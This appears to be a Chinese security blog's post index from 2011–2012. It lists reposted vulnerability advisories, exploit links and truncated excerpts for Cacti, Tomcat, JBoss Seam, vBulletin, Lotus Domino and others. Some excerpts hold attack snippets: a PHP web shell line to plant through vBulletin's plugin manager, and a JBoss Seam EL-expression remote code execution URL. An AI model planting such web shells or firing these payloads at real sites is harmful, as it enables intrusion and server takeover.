- 博客(4233)
- 资源 (2)
- 收藏
- 关注
转载 Cacti Multiple Input Validation Security Vulnerabilities
http://www.securityfocus.com/bid/39639/exploit
2012-01-16 10:45:17
599
转载 Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/45914/exploit
2012-01-16 10:30:30
755
转载 Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html
2012-01-16 10:26:17
1007
转载 op5 Appliance Multiple Remote Command Execution Vulnerabilities
http://www.securityfocus.com/bid/51212/exploit
2012-01-16 10:19:37
567
转载 Apache Tomcat information disclosure vulnerability
CVE-2010-1157: Apache Tomcat information disclosure vulnerabilitySeverity: LowVendor: The Apache Software FoundationVersions Affected:- - Tomcat 6.0.0 to 6.0.26- - Tomcat 5.5.0 to 5.5.
2012-01-16 10:15:58
1104
转载 tomcat RequestDispatcher directory traversal vulnerability
CVE-2008-5515: Apache Tomcat information disclosure vulnerabilitySeverity: ImportantVendor:The Apache Software FoundationVersions Affected:Tomcat 4.1.0 to 4.1.39Tomcat 5.5.0 to 5.5.2
2012-01-16 10:07:19
900
转载 JBoss Cache NonManagedConnectionFactory will log the password in clear text when an exception occurs
http://anonsvn.jboss.org/repos/jbosscache/core/trunk/src/main/java/org/jboss/cache/loader/NonManagedConnectionFactory.java088 public Connection getConnection()089 {......099 catch (SQLExceptio
2012-01-16 09:49:23
727
转载 CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection
CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injectionAn interesting local file inclusion vulnerability has been recently published. An XXE (XML eXternal Entity) injection attack, whi
2012-01-15 17:41:55
1187
转载 Backtrack5安装Arachni
apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev2、安装arachnigem install arachni3、运行web界面arachni_web_autostartreference:https://github.com/Zapotek/arachni/
2012-01-11 11:24:34
2372
1
原创 Arachni – Web Application Vulnerability Scanning Framework
https://github.com/Zapotek/arachni/downloads
2012-01-11 11:19:49
766
原创 sqlmap video
http://www.youtube.com/watch?v=SG7V5acSgIYhttp://www.youtube.com/watch?NR=1&feature=endscreen&v=NFmAdluw4GI
2012-01-10 09:51:22
580
转载 Oracle GlassFish Server Administration Bypass
http://packetstormsecurity.org/files/108381/NGS00106.txt
2012-01-06 10:11:32
668
转载 bypassing waf's in sql injection
http://packetstorm.wowhacker.com/papers/attack/bypass-waf.txt
2012-01-05 10:03:55
678
转载 Beyond SQLi: Obfuscate and Bypass
http://packetstorm.wowhacker.com/papers/attack/beyond-sqli.txt
2012-01-05 09:30:39
643
转载 Time-Based Blind NoSQL Injection
http://packetstorm.wowhacker.com/papers/general/timebased-nosql.txtTime-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilitiesIn July 2011, Bryan Sullivan, a
2012-01-05 09:25:22
864
转载 Time-Based Blind NoSQL Injection
Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilitiesIn July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-si
2012-01-05 09:24:59
1048
转载 Cold Fusion Hacking
http://www.blackhatacademy.org/security101/index.php?title=Cold_Fusion_Hacking
2012-01-04 14:25:39
871
转载 跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法!
跨站腳本攻擊(Cross Site Scripting,簡稱 XSS,亦翻為跨網站的入侵字串)又有新的攻擊語法!此次觸發惡意腳本不需要用到 script 標籤(譬如 alert(1)),也不用 javascript 協定(譬如 javascript:alert(1)),而是 8 月 26 日所揭露的是一個很早就有但普遍少用的標籤,其功能與、、,以及類似,都可供使用者輸入資料。onerror
2012-01-04 09:55:34
1055
转载 web service hacking
http://www.soapui.org/SOAP-and-WSDL/web-service-hacking.html
2011-12-31 10:45:10
851
转载 Executing arbitrary code on websphere
/wssamplemtom/demo部署即可获得webshell/snoopwww.exploit-db.com/download_pdf/12935/
2011-12-30 14:22:59
852
转载 Using CURL to exploit LFI to RCE from command line
http://www.youtube.com/watch?v=kf5kZIKtSO0&feature=player_embedded
2011-12-30 11:08:15
1388
转载 IBM Lotus Domino Authentication Bypass
# Exploit Title: IBM Lotus Domino Controller auth. bypass# Date:30/11/2011# Author: Alexey Sintsov# Software Link: http://www.ibm.com/# Version:8.5.3/8.5.2 FP3 (0day) # Tested on: Windows 7
2011-12-30 09:44:07
1513
转载 Privilege escalation vulnerabilities in Nagios XI installer
================Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9Author: 0a29406d9794e4f9b30b3c5d6702c708twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940===========
2011-12-30 09:40:46
1580
转载 Citrix XenDesktop, XenServer, Receiver 5.6 SP2 Pass-The-Hash
Tested against: Citrix XenDesktop, XenServer, Receiver 5.6 SP2 (possibly other versions as well)By default, the authentication between the Citrix Receiver client to the Web interface is not config
2011-12-30 09:39:08
1734
转载 CentOS 安装xfce桌面+vncserver远程管理
现在便宜的VPS很多,有些买到都没用几次,在手上闲着还不如利用起来,虽然用ssh也可以管理,但是用图形可以做更多的事情,比如挂电驴,BT之类的.首先安装桌面环境,我选择的是xfce,轻量级桌面,小巧实用不占太多内存,输入下面命令安装:yum groupinstall xfce-4.4装完桌面之后就是安装vncserver了,输入下面命令安装:yum install vnc vnc-
2011-12-29 17:47:59
2113
转载 Splunk Remote Root Exploit
http://www.exploit-db.com/exploits/18245/from sec1httplib.requestbuilder import Requestobj from sec1httplib.thread_dispatcher import *import thr
2011-12-21 08:47:51
2333
转载 一例千万级pv高性能高并发网站架构
一例千万级pv高性能高并发网站架构 http://blog.liuts.com/post/234/受CU管理员的邀请参考“千万级pv高性能高并发网站架构与设计交流探讨帖”主题的交流,发表了一案例与大家分享。 一个支撑千万级PV的网站是非常考验一个架构是否成熟、健壮(本文不涉及软件架构的层面,有兴趣也可以讨论)。现抛出一个系统层面的架构,不保证是最优的方案,但也许适合你。理由
2011-12-20 10:17:25
4045
转载 vBulletin 论坛全版本 后台拿shell
在后台,进插件管理.添加插件.Ajax_complete 填入代码:1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;}1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;}激活mod访问www.site.com/foruml
2011-12-20 10:16:49
1912
原创 security 相关标准secure coding
http://www.cert.org/secure-coding/scstandards.htmlhttp://cwe.mitre.org/top25/index.html
2011-12-20 10:11:16
998
转载 Exchange 导出用户数据
首先,需要给管理用户提权,操作在另外一篇文章中有介绍,也可以参见http://technet.microsoft.com/zh-cn/library/bb266964(EXCHG.80).aspx在 Exchange 2007 SP1 中使用 Exchange 命令行管理程序导出邮箱数据的步骤若要将邮箱的特殊文件夹和空文件夹导出到目标邮箱的某个文件夹中,请运行以下命令:
2011-12-16 14:43:48
5235
转载 Monitoring von Cisco ASA und IPS über NAGIOS
Anbei die Konfigurationsschritte um über Nagios Cisco ASA oder IPS Appliances zu überwachen.Es muss Die Datei commands.cfg angepasst werden.Die entsprechenden Scripte, von der NAGIOS Community, ch
2011-12-16 11:05:07
1228
转载 jboss seam 远程执行漏洞利用步骤
目标:http://www.ip.comhttp://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('j
2011-12-15 10:59:01
2778
转载 JBoss Seam Framework remote code execution
Here's interesting bug I found in JBoss Seam Framework, which led to remote code execution using JBoss EL expressions. Having any sort of custom expression language in a web framework is always a sign
2011-12-15 10:32:07
1946
原创 lotus domino寻找用户查看过哪些邮件
Longrun/ZGYH/BJ() 9:29:32 好象要通过日志分析,然后在日志分析中查看邮件的UNID来确定用户看过的邮件,有点复杂…… Longrun/ZGYH/BJ() 9:30:15 而且是本地的loga4.nsf分析,会把PC机转死的……
2011-12-14 09:50:04
1198
转载 Configuration Management under FreeBSD with Cfengine 3.
http://unix-heaven.org/node/50 http://blog.zzamboni.org/editing-sshd-configuration-files-with-cfengin
2011-12-11 21:40:45
806
原创 citrix中文文档中心
http://support.citrix.com/proddocs/topic/xenapp/nl/zh/cn/xenapp65-w2k8-wrapper.html?locale=cn
2011-12-06 10:27:51
1490
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人